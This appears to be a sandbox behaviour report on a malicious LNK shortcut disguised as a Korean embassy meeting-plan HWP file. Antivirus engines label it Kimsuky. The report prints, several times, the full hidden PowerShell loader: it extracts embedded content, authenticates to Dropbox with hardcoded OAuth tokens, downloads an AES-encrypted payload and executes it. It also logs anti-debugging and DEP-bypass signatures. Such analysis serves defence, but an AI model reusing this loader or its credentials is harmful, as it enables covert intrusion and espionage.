process_identifier: 2764
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02676000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2764
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026ac000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2764
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02693000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2764
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02694000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2764
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02695000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2764
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02696000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2764
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02697000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2764
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02698000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2764
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02699000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2764
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05030000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2764
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05031000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2764
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05032000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2764
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05033000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2764
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05034000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2764
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05035000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2764
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05036000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2764
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05037000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2764
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05038000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2764
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05039000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2764
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0503a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2764
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0503b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2764
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0503c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2764
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0503d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2764
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0503e000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2764
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0503f000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2764
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05040000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2764
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05041000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2764
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05042000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2764
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05043000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2764
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05044000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Roaming\HNC\Office\Recent\Temp.folder.lnk
file C:\Users\test22\AppData\Roaming\HNC\Office\Recent\202404_주중한국대사관 한중 북중·안보현안 1.5트랙 비공개 정책간담회 대면회의 계획(안).hwp.lnk
file C:\Users\test22\AppData\Local\Temp\202404_주중한국대사관 한중 북중·안보현안 1.5트랙 비공개 정책간담회 대면회의 계획(안).hwp.lnk
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline "C:\Windows\system32\cmd.exe" /c powershell -windowstyle hidden -nop -NoProfile -NonInteractive -c "$tmp = 'C:\Users\test22\AppData\Local\Temp';$lnkpath = Get-ChildItem *.lnk;foreach ($path in $lnkpath) { if ($path.length -eq 0x0010F27C) { $lnkpath = $path;}}foreach ($item in $lnkpath) { $lnkpath = $item.Name;}$InputStream = New-Object System.IO.FileStream($lnkpath, [IO.FileMode]::Open, [System.IO.FileAccess]::Read);$file=New-Object Byte[]($InputStream.length);$len=$InputStream.Read($file,0,$file.Length);$InputStream.Dispose();write-host \"readfileend\";$path = $lnkpath.substring(0,$lnkpath.length-4);$path1 = 'C:\Users\test22\AppData\Local\Temp\tmp' + (Get-Random) + '.vbs';$len1 = 1057248;$len2 = 1110496;$len3 = 1110496;$temp = New-Object Byte[]($len2-$len1);write-host \"exestart\";for($i=$len1; $i -lt $len2; $i++) { $temp[$i-$len1] = $file[$i]};sc $path ([byte[]]$temp) -Encoding Byte;write-host \"exeend\";$temp = New-Object Byte[]($file.Length-$len3);for($i=$len3; $i -lt $file.Length; $i++) { $temp[$i-$len3] = $file[$i]}; $encData_b64 = Start-Process -FilePath $path;[System.IO.File]::Delete($lnkpath);Function AESDecrypt { param ( [Byte[]]$bytes,[String]$pass=\"pa55w0rd\") $InputStream = New-Object System.IO.MemoryStream(,$bytes);$OutputStream = New-Object System.IO.MemoryStream;$Salt = New-Object Byte[](32);$BytesRead = $InputStream.Read($Salt, 0, $Salt.Length);if ( $BytesRead -ne $Salt.Length ) { exit;} $PBKDF2 = New-Object System.Security.Cryptography.Rfc2898DeriveBytes($pass, $Salt);$AESKey = $PBKDF2.GetBytes(32);$AESIV = $PBKDF2.GetBytes(16);$AES = New-Object Security.Cryptography.AesManaged;$Dec = $AES.CreateDecryptor($AESKey, $AESIV);$CryptoStream = New-Object System.Security.Cryptography.CryptoStream($InputStream, $Dec, [System.Security.Cryptography.CryptoStreamMode]::Read);$CryptoStream.CopyTo($OutputStream);$OutputStream.Dispose();return $OutputStream.ToArray();} $clientID = \"oj8kd1lzqrw7v3m\";$clientSecret = \"vwp27gytekx9jfq\";$refreshToken = \"wR3_ULk2OicAAAAAAAAAAV81-_COcFPa8SN0V5K-ZPTYB-BVIH5E1c4_fqLOCC_u\";$body = @{grant_type=\"refresh_token\";refresh_token=$refreshToken;client_id=$clientID;client_secret=$clientSecret};$tokenEndpoint = \"https://api.dropboxapi.com/oauth2/token\";$response = Invoke-RestMethod -Uri $tokenEndpoint -Method Post -Body $body;if ($response.access_token) {$accessToken = $response.access_token;}$downloadUrl = \"https://content.dropboxapi.com/2/files/download\";$remoteFilePath = \"/step5/ps.bin\";$request = [System.Net.HttpWebRequest]::Create($downloadUrl);$request.Method = \"POST\";$request.Headers.Add(\"Authorization\", \"Bearer $accessToken\");$request.Headers.Add(\"Dropbox-API-Arg\", '{\"path\": \"' + $remoteFilePath + '\"}');$response = $request.GetResponse();$receiveStream = $response.GetResponseStream();$pass = \"pa55w0rd\";if ($receiveStream -ne $null) {$streamReader = New-Object System.IO.StreamReader($receiveStream);$memoryStream = New-Object System.IO.MemoryStream;$buffer = New-Object byte[] 1024;$read = 0;do { $read = $receiveStream.Read($buffer, 0, $buffer.Length);$memoryStream.Write($buffer, 0, $read);} while ($read -gt 0);$enc_bytes = $memoryStream.ToArray();$dec_bytes = AESDecrypt -bytes $enc_bytes -pass $pass;$newString = [System.Text.Encoding]::UTF8.GetString($dec_bytes);iex $newString;$memoryStream.Close();$streamReader.Close();};$receiveStream.Close();$response.Close();"
cmdline powershell -windowstyle hidden -nop -NoProfile -NonInteractive -c "$tmp = 'C:\Users\test22\AppData\Local\Temp';$lnkpath = Get-ChildItem *.lnk;foreach ($path in $lnkpath) { if ($path.length -eq 0x0010F27C) { $lnkpath = $path;}}foreach ($item in $lnkpath) { $lnkpath = $item.Name;}$InputStream = New-Object System.IO.FileStream($lnkpath, [IO.FileMode]::Open, [System.IO.FileAccess]::Read);$file=New-Object Byte[]($InputStream.length);$len=$InputStream.Read($file,0,$file.Length);$InputStream.Dispose();write-host \"readfileend\";$path = $lnkpath.substring(0,$lnkpath.length-4);$path1 = 'C:\Users\test22\AppData\Local\Temp\tmp' + (Get-Random) + '.vbs';$len1 = 1057248;$len2 = 1110496;$len3 = 1110496;$temp = New-Object Byte[]($len2-$len1);write-host \"exestart\";for($i=$len1; $i -lt $len2; $i++) { $temp[$i-$len1] = $file[$i]};sc $path ([byte[]]$temp) -Encoding Byte;write-host \"exeend\";$temp = New-Object Byte[]($file.Length-$len3);for($i=$len3; $i -lt $file.Length; $i++) { $temp[$i-$len3] = $file[$i]}; $encData_b64 = Start-Process -FilePath $path;[System.IO.File]::Delete($lnkpath);Function AESDecrypt { param ( [Byte[]]$bytes,[String]$pass=\"pa55w0rd\") $InputStream = New-Object System.IO.MemoryStream(,$bytes);$OutputStream = New-Object System.IO.MemoryStream;$Salt = New-Object Byte[](32);$BytesRead = $InputStream.Read($Salt, 0, $Salt.Length);if ( $BytesRead -ne $Salt.Length ) { exit;} $PBKDF2 = New-Object System.Security.Cryptography.Rfc2898DeriveBytes($pass, $Salt);$AESKey = $PBKDF2.GetBytes(32);$AESIV = $PBKDF2.GetBytes(16);$AES = New-Object Security.Cryptography.AesManaged;$Dec = $AES.CreateDecryptor($AESKey, $AESIV);$CryptoStream = New-Object System.Security.Cryptography.CryptoStream($InputStream, $Dec, [System.Security.Cryptography.CryptoStreamMode]::Read);$CryptoStream.CopyTo($OutputStream);$OutputStream.Dispose();return $OutputStream.ToArray();} $clientID = \"oj8kd1lzqrw7v3m\";$clientSecret = \"vwp27gytekx9jfq\";$refreshToken = \"wR3_ULk2OicAAAAAAAAAAV81-_COcFPa8SN0V5K-ZPTYB-BVIH5E1c4_fqLOCC_u\";$body = @{grant_type=\"refresh_token\";refresh_token=$refreshToken;client_id=$clientID;client_secret=$clientSecret};$tokenEndpoint = \"https://api.dropboxapi.com/oauth2/token\";$response = Invoke-RestMethod -Uri $tokenEndpoint -Method Post -Body $body;if ($response.access_token) {$accessToken = $response.access_token;}$downloadUrl = \"https://content.dropboxapi.com/2/files/download\";$remoteFilePath = \"/step5/ps.bin\";$request = [System.Net.HttpWebRequest]::Create($downloadUrl);$request.Method = \"POST\";$request.Headers.Add(\"Authorization\", \"Bearer $accessToken\");$request.Headers.Add(\"Dropbox-API-Arg\", '{\"path\": \"' + $remoteFilePath + '\"}');$response = $request.GetResponse();$receiveStream = $response.GetResponseStream();$pass = \"pa55w0rd\";if ($receiveStream -ne $null) {$streamReader = New-Object System.IO.StreamReader($receiveStream);$memoryStream = New-Object System.IO.MemoryStream;$buffer = New-Object byte[] 1024;$read = 0;do { $read = $receiveStream.Read($buffer, 0, $buffer.Length);$memoryStream.Write($buffer, 0, $read);} while ($read -gt 0);$enc_bytes = $memoryStream.ToArray();$dec_bytes = AESDecrypt -bytes $enc_bytes -pass $pass;$newString = [System.Text.Encoding]::UTF8.GetString($dec_bytes);iex $newString;$memoryStream.Close();$streamReader.Close();};$receiveStream.Close();$response.Close();"
Time & API Arguments Status Return Repeated

CreateProcessInternalW

thread_identifier: 2664
thread_handle: 0x00000334
process_identifier: 2660
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\cmd.exe
track: 1
command_line: "C:\Windows\system32\cmd.exe" /c powershell -windowstyle hidden -nop -NoProfile -NonInteractive -c "$tmp = 'C:\Users\test22\AppData\Local\Temp';$lnkpath = Get-ChildItem *.lnk;foreach ($path in $lnkpath) { if ($path.length -eq 0x0010F27C) { $lnkpath = $path;}}foreach ($item in $lnkpath) { $lnkpath = $item.Name;}$InputStream = New-Object System.IO.FileStream($lnkpath, [IO.FileMode]::Open, [System.IO.FileAccess]::Read);$file=New-Object Byte[]($InputStream.length);$len=$InputStream.Read($file,0,$file.Length);$InputStream.Dispose();write-host \"readfileend\";$path = $lnkpath.substring(0,$lnkpath.length-4);$path1 = 'C:\Users\test22\AppData\Local\Temp\tmp' + (Get-Random) + '.vbs';$len1 = 1057248;$len2 = 1110496;$len3 = 1110496;$temp = New-Object Byte[]($len2-$len1);write-host \"exestart\";for($i=$len1; $i -lt $len2; $i++) { $temp[$i-$len1] = $file[$i]};sc $path ([byte[]]$temp) -Encoding Byte;write-host \"exeend\";$temp = New-Object Byte[]($file.Length-$len3);for($i=$len3; $i -lt $file.Length; $i++) { $temp[$i-$len3] = $file[$i]}; $encData_b64 = Start-Process -FilePath $path;[System.IO.File]::Delete($lnkpath);Function AESDecrypt { param ( [Byte[]]$bytes,[String]$pass=\"pa55w0rd\") $InputStream = New-Object System.IO.MemoryStream(,$bytes);$OutputStream = New-Object System.IO.MemoryStream;$Salt = New-Object Byte[](32);$BytesRead = $InputStream.Read($Salt, 0, $Salt.Length);if ( $BytesRead -ne $Salt.Length ) { exit;} $PBKDF2 = New-Object System.Security.Cryptography.Rfc2898DeriveBytes($pass, $Salt);$AESKey = $PBKDF2.GetBytes(32);$AESIV = $PBKDF2.GetBytes(16);$AES = New-Object Security.Cryptography.AesManaged;$Dec = $AES.CreateDecryptor($AESKey, $AESIV);$CryptoStream = New-Object System.Security.Cryptography.CryptoStream($InputStream, $Dec, [System.Security.Cryptography.CryptoStreamMode]::Read);$CryptoStream.CopyTo($OutputStream);$OutputStream.Dispose();return $OutputStream.ToArray();} $clientID = \"oj8kd1lzqrw7v3m\";$clientSecret = \"vwp27gytekx9jfq\";$refreshToken = \"wR3_ULk2OicAAAAAAAAAAV81-_COcFPa8SN0V5K-ZPTYB-BVIH5E1c4_fqLOCC_u\";$body = @{grant_type=\"refresh_token\";refresh_token=$refreshToken;client_id=$clientID;client_secret=$clientSecret};$tokenEndpoint = \"https://api.dropboxapi.com/oauth2/token\";$response = Invoke-RestMethod -Uri $tokenEndpoint -Method Post -Body $body;if ($response.access_token) {$accessToken = $response.access_token;}$downloadUrl = \"https://content.dropboxapi.com/2/files/download\";$remoteFilePath = \"/step5/ps.bin\";$request = [System.Net.HttpWebRequest]::Create($downloadUrl);$request.Method = \"POST\";$request.Headers.Add(\"Authorization\", \"Bearer $accessToken\");$request.Headers.Add(\"Dropbox-API-Arg\", '{\"path\": \"' + $remoteFilePath + '\"}');$response = $request.GetResponse();$receiveStream = $response.GetResponseStream();$pass = \"pa55w0rd\";if ($receiveStream -ne $null) {$streamReader = New-Object System.IO.StreamReader($receiveStream);$memoryStream = New-Object System.IO.MemoryStream;$buffer = New-Object byte[] 1024;$read = 0;do { $read = $receiveStream.Read($buffer, 0, $buffer.Length);$memoryStream.Write($buffer, 0, $read);} while ($read -gt 0);$enc_bytes = $memoryStream.ToArray();$dec_bytes = AESDecrypt -bytes $enc_bytes -pass $pass;$newString = [System.Text.Encoding]::UTF8.GetString($dec_bytes);iex $newString;$memoryStream.Close();$streamReader.Close();};$receiveStream.Close();$response.Close();"
filepath_r: C:\Windows\system32\cmd.exe
stack_pivoted: 0
creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_SUSPENDED|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x0000033c
1 1 0

CreateProcessInternalW

thread_identifier: 2768
thread_handle: 0x00000084
process_identifier: 2764
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
track: 1
command_line: powershell -windowstyle hidden -nop -NoProfile -NonInteractive -c "$tmp = 'C:\Users\test22\AppData\Local\Temp';$lnkpath = Get-ChildItem *.lnk;foreach ($path in $lnkpath) { if ($path.length -eq 0x0010F27C) { $lnkpath = $path;}}foreach ($item in $lnkpath) { $lnkpath = $item.Name;}$InputStream = New-Object System.IO.FileStream($lnkpath, [IO.FileMode]::Open, [System.IO.FileAccess]::Read);$file=New-Object Byte[]($InputStream.length);$len=$InputStream.Read($file,0,$file.Length);$InputStream.Dispose();write-host \"readfileend\";$path = $lnkpath.substring(0,$lnkpath.length-4);$path1 = 'C:\Users\test22\AppData\Local\Temp\tmp' + (Get-Random) + '.vbs';$len1 = 1057248;$len2 = 1110496;$len3 = 1110496;$temp = New-Object Byte[]($len2-$len1);write-host \"exestart\";for($i=$len1; $i -lt $len2; $i++) { $temp[$i-$len1] = $file[$i]};sc $path ([byte[]]$temp) -Encoding Byte;write-host \"exeend\";$temp = New-Object Byte[]($file.Length-$len3);for($i=$len3; $i -lt $file.Length; $i++) { $temp[$i-$len3] = $file[$i]}; $encData_b64 = Start-Process -FilePath $path;[System.IO.File]::Delete($lnkpath);Function AESDecrypt { param ( [Byte[]]$bytes,[String]$pass=\"pa55w0rd\") $InputStream = New-Object System.IO.MemoryStream(,$bytes);$OutputStream = New-Object System.IO.MemoryStream;$Salt = New-Object Byte[](32);$BytesRead = $InputStream.Read($Salt, 0, $Salt.Length);if ( $BytesRead -ne $Salt.Length ) { exit;} $PBKDF2 = New-Object System.Security.Cryptography.Rfc2898DeriveBytes($pass, $Salt);$AESKey = $PBKDF2.GetBytes(32);$AESIV = $PBKDF2.GetBytes(16);$AES = New-Object Security.Cryptography.AesManaged;$Dec = $AES.CreateDecryptor($AESKey, $AESIV);$CryptoStream = New-Object System.Security.Cryptography.CryptoStream($InputStream, $Dec, [System.Security.Cryptography.CryptoStreamMode]::Read);$CryptoStream.CopyTo($OutputStream);$OutputStream.Dispose();return $OutputStream.ToArray();} $clientID = \"oj8kd1lzqrw7v3m\";$clientSecret = \"vwp27gytekx9jfq\";$refreshToken = \"wR3_ULk2OicAAAAAAAAAAV81-_COcFPa8SN0V5K-ZPTYB-BVIH5E1c4_fqLOCC_u\";$body = @{grant_type=\"refresh_token\";refresh_token=$refreshToken;client_id=$clientID;client_secret=$clientSecret};$tokenEndpoint = \"https://api.dropboxapi.com/oauth2/token\";$response = Invoke-RestMethod -Uri $tokenEndpoint -Method Post -Body $body;if ($response.access_token) {$accessToken = $response.access_token;}$downloadUrl = \"https://content.dropboxapi.com/2/files/download\";$remoteFilePath = \"/step5/ps.bin\";$request = [System.Net.HttpWebRequest]::Create($downloadUrl);$request.Method = \"POST\";$request.Headers.Add(\"Authorization\", \"Bearer $accessToken\");$request.Headers.Add(\"Dropbox-API-Arg\", '{\"path\": \"' + $remoteFilePath + '\"}');$response = $request.GetResponse();$receiveStream = $response.GetResponseStream();$pass = \"pa55w0rd\";if ($receiveStream -ne $null) {$streamReader = New-Object System.IO.StreamReader($receiveStream);$memoryStream = New-Object System.IO.MemoryStream;$buffer = New-Object byte[] 1024;$read = 0;do { $read = $receiveStream.Read($buffer, 0, $buffer.Length);$memoryStream.Write($buffer, 0, $read);} while ($read -gt 0);$enc_bytes = $memoryStream.ToArray();$dec_bytes = AESDecrypt -bytes $enc_bytes -pass $pass;$newString = [System.Text.Encoding]::UTF8.GetString($dec_bytes);iex $newString;$memoryStream.Close();$streamReader.Close();};$receiveStream.Close();$response.Close();"
filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000088
1 1 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

flags: 15
family: 0
111 0
Data received [binary data, not representable as text]
Data received [binary data, not representable as text]
Data sent [binary data, not representable as text; contains the server name content.dropboxapi.com]
Data sent [binary data, not representable as text; contains the server name content.dropboxapi.com]
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule DebuggerException__SetConsoleCtrl
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
Time & API Arguments Status Return Repeated

send

buffer: [126 bytes of binary data, not representable as text; contains the server name content.dropboxapi.com]
socket: 1476
sent: 126
1 126 0

send

buffer: [126 bytes of binary data, not representable as text; contains the server name content.dropboxapi.com]
socket: 1476
sent: 126
1 126 0
parent_process powershell.exe martian_process 202404_주중한국대사관 한중 북중·안보현안 1.5트랙 비공개 정책간담회 대면회의 계획(안).hwp
parent_process powershell.exe martian_process "C:\Program Files (x86)\Hnc\Hwp80\Hwp.exe" "C:\Users\test22\AppData\Local\Temp\202404_주중한국대사관 한중 북중·안보현안 1.5트랙 비공개 정책간담회 대면회의 계획(안).hwp"
Process injection Process 2548 resumed a thread in remote process 2660
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x00000334
suspend_count: 1
process_identifier: 2660
1 0 0
option -nop value Does not load current user profile
option -windowstyle hidden value Attempts to execute command with a hidden window
option -noninteractive value Prevents creating an interactive prompt for the user
Lionic Trojan.WinLNK.Boxter.4!c
CAT-QuickHeal Lnk.trojan.A12022571
Skyhigh BehavesLike.Dropper.tx
ALYac Trojan.Agent.LNK.Gen
VIPRE Heur.BZC.YAX.Boxter.331.8F498F23
Arcabit Heur.BZC.YAX.Boxter.331.8F498F23
Symantec Scr.Mallnk!gen13
ESET-NOD32 LNK/Kimsuky.H
TrendMicro-HouseCall TROJ_FRS.0NA103D424
McAfee LNK/Agent.aj
Avast LNK:Agent-IL [Trj]
Kaspersky HEUR:Trojan.Multi.Powecod.i
BitDefender Heur.BZC.YAX.Boxter.331.8F498F23
MicroWorld-eScan Heur.BZC.YAX.Boxter.331.8F498F23
Rising Trojan.PSRunner/LNK!1.DB7E (CLASSIC)
Emsisoft Trojan.PowerShell.Gen (A)
DrWeb Trojan.MulDrop26.46164
TrendMicro TROJ_FRS.0NA103D424
FireEye Heur.BZC.YAX.Boxter.331.8F498F23
Sophos Troj/LnkObf-T
Ikarus Trojan.SuspectCRC
Google Detected
MAX malware (ai score=83)
Kingsoft Script.Troj.CMDLnk.22143
Microsoft Trojan:Win32/Casdet!rfn
ViRobot LNK.S.PowerShell.1110652
ZoneAlarm HEUR:Trojan.Multi.Powecod.i
GData Heur.BZC.YAX.Boxter.331.8F498F23
Varist LNK/ABTrojan.AGHM-1
AhnLab-V3 Downloader/LNK.Powershell.S2543
VBA32 Trojan.Link.Crafted
Tencent Win32.Trojan.Powecod.Bgow
huorong TrojanDownloader/LNK.Agent.co
Fortinet LNK/Kimsuky.GOSU!tr
AVG LNK:Agent-IL [Trj]
alibabacloud Trojan:Win/Kimsuky.H
file C:\Windows\System32\ie4uinit.exe
file C:\Program Files\Windows Sidebar\sidebar.exe
file C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file C:\Windows\System32\xpsrchvw.exe
file C:\Windows\System32\displayswitch.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file C:\Windows\System32\mblctr.exe
file C:\Windows\System32\mstsc.exe
file C:\Windows\System32\SnippingTool.exe
file C:\Windows\System32\SoundRecorder.exe
file C:\Windows\System32\dfrgui.exe
file C:\Windows\System32\msinfo32.exe
file C:\Windows\System32\rstrui.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file C:\Program Files\Windows Journal\Journal.exe
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file C:\Windows\System32\MdSched.exe
file C:\Windows\System32\msconfig.exe
file C:\Windows\System32\recdisc.exe
file C:\Windows\System32\msra.exe
file C:\Program Files (x86)\Hnc\Hwp80\Hwp.exe